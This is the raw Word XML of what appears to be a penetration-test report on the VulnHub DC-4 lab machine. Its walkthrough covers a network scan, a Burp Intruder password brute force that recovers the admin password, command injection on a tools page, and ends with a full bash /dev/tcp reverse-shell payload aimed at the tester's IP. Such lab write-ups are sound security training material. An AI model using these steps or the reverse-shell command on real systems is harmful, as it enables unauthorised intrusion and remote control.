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7470"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD1910" w14:paraId="41EBC7D8" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4322EDB6" w14:textId="3F3A1F32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>Machine Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E064758" w14:textId="5ACCDD44" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71E2">
            <w:p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DC-4 is a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>VulnHub</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> boot2root Linux VM where initial access is achieved via a weak web login and command injection on a tools page, followed by credential discovery and staged privilege escalation to root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="3E14E891" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5E913F" w14:textId="491648F1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>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF6E750" w14:textId="6BE9FAB3" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.50.41.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="7D8E8FA0" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432AC9EF" w14:textId="07E9735F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7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B91A5B2" w14:textId="2F518477" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71E2" w:rsidP="00EE71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Command Injection </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="48A23A69" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6128F7E4" w14:textId="7EBD17EF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>Service / Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBACEF3" w14:textId="5A33D6AC" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71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 / 80 HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="3E81095C" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A7AAFC" w14:textId="0FC68248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 xml:space="preserve">CVSS Score / Severity </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45573B0C" w14:textId="17D47E3B" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71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EE71E2" w14:paraId="61E26573" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF50BFE" w14:textId="3AF3A515" w:rsidR="00EE71E2" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71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7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D9DC3A" w14:textId="463D6FD3" w:rsidR="00EE71E2" w:rsidRDefault="00EE71E2">
            <w:p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>CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="3B31FDA2" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7750EBA1" w14:textId="3EFD7A30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>Proof Of Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A0FCB27" w14:textId="22BECA34" w:rsidR="00A737DC" w:rsidRDefault="00A73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1 –</w:t>
            </w:r>
            <w:r w:rsidR="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discover the target IP using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550149E3" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C0B0A32" w14:textId="1A0FB477" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00467F1E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678AF339" wp14:editId="5BA1762D">
                  <wp:extent cx="4578350" cy="3522980"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1019470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706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352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F84C7" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3194C16F" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C993A75" w14:textId="16AA19B7" w:rsidR="00A737DC" w:rsidRDefault="00A73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2 –</w:t>
            </w:r>
            <w:r w:rsidR="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Scan for Open ports and running services on target using Nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7410F04B" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E70E6C8" w14:textId="3A6E6FE8" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00467F1E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9C7E402" wp14:editId="52705350">
                  <wp:extent cx="4533900" cy="2475230"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1463146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464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A127D" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F0C321F" w14:textId="52ECBB8C" w:rsidR="00A737DC" w:rsidRDefault="00A73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– </w:t>
            </w:r>
            <w:r w:rsidR="00467F1E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerating TCP 80 HTTP </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D01509" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36D18CB0" w14:textId="0CBBECA0" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00467F1E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20716D6D" wp14:editId="196DFFD9">
                  <wp:extent cx="4565650" cy="2254885"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="830254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542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225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DC41C" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66F017E6" w14:textId="0D58D955" w:rsidR="00467F1E" w:rsidRDefault="00A1779C" w:rsidP="00A1779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Found Files on Web page </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370EA1C7" w14:textId="77777777" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="363CBD3F" w14:textId="28540837" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1779C">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACBFD46" wp14:editId="181D1C30">
                  <wp:extent cx="4565650" cy="2529205"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
                  <wp:docPr id="631081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081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252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8A3CF" w14:textId="77777777" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3142DF58" w14:textId="756C0AF6" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779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So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> it means we have only on entry point so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try to brute force for admin user on target system lets use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> intruder and rockyou.txt as wordlist </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F468A25" w14:textId="77777777" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="358DD3DE" w14:textId="60825558" w:rsidR="00A1779C" w:rsidRDefault="00DD1910" w:rsidP="00DD191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Intercept Request in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>burpsuite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D3D5FA7" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36FCAFB4" w14:textId="38906EB9" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F47964" wp14:editId="4DE2D7D9">
                  <wp:extent cx="4610100" cy="2955925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="150974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441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95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1BFC4" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7710FC4B" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1595BB87" w14:textId="41614669" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD191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Send to Intruder and load payloads from </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rockyou.txt  as</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> set payload position </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F49567" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="519988CA" w14:textId="434F2563" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5A31D0" wp14:editId="1DAF5019">
                  <wp:extent cx="4552950" cy="3097530"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="138118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88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0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F321A" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="753A2EB1" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AAE38A3" w14:textId="632B62CA" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="EE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Look for the Content Lenth and filter by it and got the password for </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">admin </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">user which is </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">happy </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A318EAA" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FA21574" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E4B887E" w14:textId="20520DF8" w:rsidR="00DD1910" w:rsidRPr="00A1779C" w:rsidRDefault="00DD1910" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EEA988" wp14:editId="1EE7DE71">
                  <wp:extent cx="4610100" cy="1861185"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="346722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7225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AA574" w14:textId="77777777" w:rsidR="00A1779C" w:rsidRDefault="00A1779C" w:rsidP="00A1779C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3799CBF9" w14:textId="2E8D7312" w:rsidR="00A1779C" w:rsidRDefault="00DD1910" w:rsidP="00DD191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Login on page </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074B98BB" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25F09E81" w14:textId="55448789" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41106D95" wp14:editId="33F16D05">
                  <wp:extent cx="4610100" cy="2072640"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="1862425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4252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875A6" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0489BDA2" w14:textId="77777777" w:rsidR="00467F1E" w:rsidRDefault="00467F1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F9EFCBB" w14:textId="6620E40F" w:rsidR="00A737DC" w:rsidRDefault="00A73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DD1910">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> We can see we can run limited commands from page but by intercepting request in burp </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00DD1910">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>lets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DD1910">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> try to modify commands and get command injection on the target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46398A76" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61203BB7" w14:textId="04789168" w:rsidR="00DD1910" w:rsidRDefault="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206EF3C9" wp14:editId="36A5A936">
                  <wp:extent cx="4552950" cy="2254250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1006317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3177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B4433" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E9BC832" w14:textId="62D85B9D" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD191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Lets</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> try to run </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> command </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AADCACC" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="575ADCBD" w14:textId="2FBFB9DD" w:rsidR="00DD1910" w:rsidRPr="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1910">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694A2CBF" wp14:editId="6E9500E7">
                  <wp:extent cx="4572000" cy="1813560"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2567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96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650A9" w14:textId="77777777" w:rsidR="00DD1910" w:rsidRDefault="00DD1910">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C5C9038" w14:textId="437BD52D" w:rsidR="00DD1910" w:rsidRDefault="00DD1910" w:rsidP="002D32D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Command got successfully executed and here we have command injection on the target system </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E966897" w14:textId="77777777" w:rsidR="002D32DE" w:rsidRPr="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32DE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C81BAAB" w14:textId="1A7BE831" w:rsidR="00A737DC" w:rsidRDefault="00A73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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lets</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> inject Payload and get reverse shell on target using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF6B568" w14:textId="77777777" w:rsidR="002D32DE" w:rsidRDefault="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BB11F7C" w14:textId="46825E62" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32D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an encoded payload and start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on port 1234</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9A9DE2" w14:textId="49AA2BF3" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32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gramStart"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/10.50.41.101/1234 0&gt;&amp;1''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
